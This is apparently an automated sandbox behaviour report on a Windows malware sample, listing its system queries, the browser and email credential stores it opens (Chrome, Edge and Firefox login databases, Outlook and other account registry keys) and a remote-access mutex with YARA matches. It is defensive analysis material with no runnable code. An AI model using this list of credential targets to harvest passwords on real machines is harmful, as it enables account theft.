                    Source: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe, 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, logs.dat.9.dr Binary or memory string: [Program Manager]
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: 9_2_10002933 cpuid 9_2_10002933
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: EnumSystemLocalesW,15_2_0045201B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: EnumSystemLocalesW,15_2_004520B6
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,15_2_00452143
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoW,15_2_00452393
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: EnumSystemLocalesW,15_2_00448484
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,15_2_004524BC
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoW,15_2_004525C3
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,15_2_00452690
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoW,15_2_0044896D
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: GetLocaleInfoA,15_2_0040F90C
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,15_2_00451D58
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: EnumSystemLocalesW,15_2_00451FD0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 9_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,9_2_10002264
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_0041B69E GetUserNameW,15_2_0041B69E
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exeCode function: 15_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,15_2_00449210
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeCode function: 17_2_0041739B GetVersionExW,17_2_0041739B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    Source: Yara match File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 5328, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7308, type: MEMORYSTR
                    Source: Yara match File source: Process Memory Space: mXJeXQoaGktJCW.exe PID: 7692, type: MEMORYSTR
                    Source: Yara match File source: C:\ProgramData\dfgh\logs.dat, type: DROPPED
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 15_2_0040BA4D
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 15_2_0040BB6B
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Code function: \key3.db 15_2_0040BB6B
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: ESMTPPassword 19_2_004033F0
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword 19_2_00402DB3
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Code function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword 19_2_00402DB3
                    Source: Yara match File source: Process Memory Space: SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe PID: 7776, type: MEMORYSTR

                    Remote Access Functionality

                    Source: C:\Users\user\Desktop\SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXH
                    Source: C:\Users\user\AppData\Roaming\mXJeXQoaGktJCW.exe Mutex created: \Sessions\1\BaseNamedObjects\Rmc-7XAUXH
                    Source: Yara match File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 15.2.mXJeXQoaGktJCW.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.3572390.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0.2.SecuriteInfo.com.W32.MSIL_Kryptik.KQK.gen.Eldorado.16672.23413.exe.34f9970.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 00000009.00000002.4487423704.0000000001130000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000F.00000002.2097259168.00000000014D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000F.00000002.2096769740.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000000.00000002.2081908581.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
